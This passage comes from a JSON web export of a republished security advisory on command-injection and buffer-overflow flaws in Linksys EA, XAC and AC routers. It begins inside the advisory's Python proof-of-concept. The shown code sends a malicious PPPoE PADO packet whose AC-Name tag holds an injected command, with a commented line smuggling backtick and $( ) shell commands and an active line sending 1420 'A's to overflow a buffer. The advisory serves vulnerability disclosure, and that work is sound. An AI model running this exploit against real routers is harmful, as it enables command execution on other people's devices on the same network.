class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">tag_value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;A&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\"><\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">PPPoE_Tag<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">tag_type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;AC-Name&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">tag_value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\"><\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-70\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">PPPoE_Tag<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">tag_type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;End-Of-List&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">tag_value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-71\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">retp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">show<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">sendp<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">retp<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-73\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">logger<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">info<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;hooray, malicious PADO sent! \ud83d\ude42 check your target!&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-75\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-76\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">__name__<\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-s\">&#8220;__main__&#8221;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-77\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">logging<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">basicConfig<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">level<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">logging<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">DEBUG<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">format<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;%(levelname)-8s &#8211; %(message)s&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-78\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">logger<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setLevel<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">logging<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">DEBUG<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-79\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-80\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">logger<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">info<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;available interfaces:&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-81\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">get_if_list<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-82\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">logger<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">info<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8221;&nbsp;&nbsp; * %s&#8221;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-83\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-84\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-85\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">logger<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">warning<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;missing cmdline options, check usage&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-86\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-87\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;usage: poc.py &lt;iface&gt;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-88\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-89\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-90\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ex<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Exploit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cd5140451019-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\">#ex.start(iface=sys.argv[1], cmd=&#8221;`echo 1 &gt; \/tmp\/inject1` $(touch \/tmp\/inject2)&#8221;)&nbsp;&nbsp;# VU1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cd5140451019-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ex<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">start<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">iface<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;A&#8221;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-cn\">1420<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># VU2<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0101 seconds] -->  <\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3102\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Maor Schwartz| Date: Wed, 19 Apr 2017 13:52:33 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes two (2) vulnerabilities found in Linksys EA, XAC and AC series devices. The vulnerabilities has been found in the way the Linksys devices (EA, XAC and AC series) handle the Point-to-point protocol over Ethernet (PPPoE) Discovery (PPPoED) process allowing an unprivileged active attacker on the same network segment (layer2) &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3102\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Linksys PPPoE Multiple Vulnerabilities<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[12033,11682,11851,10757],"class_list":["post-7393","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-buffer-overflow","tag-remote-code-execution","tag-remote-command-execution","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7393","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=7393"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7393\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=7393"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=7393"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=7393"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}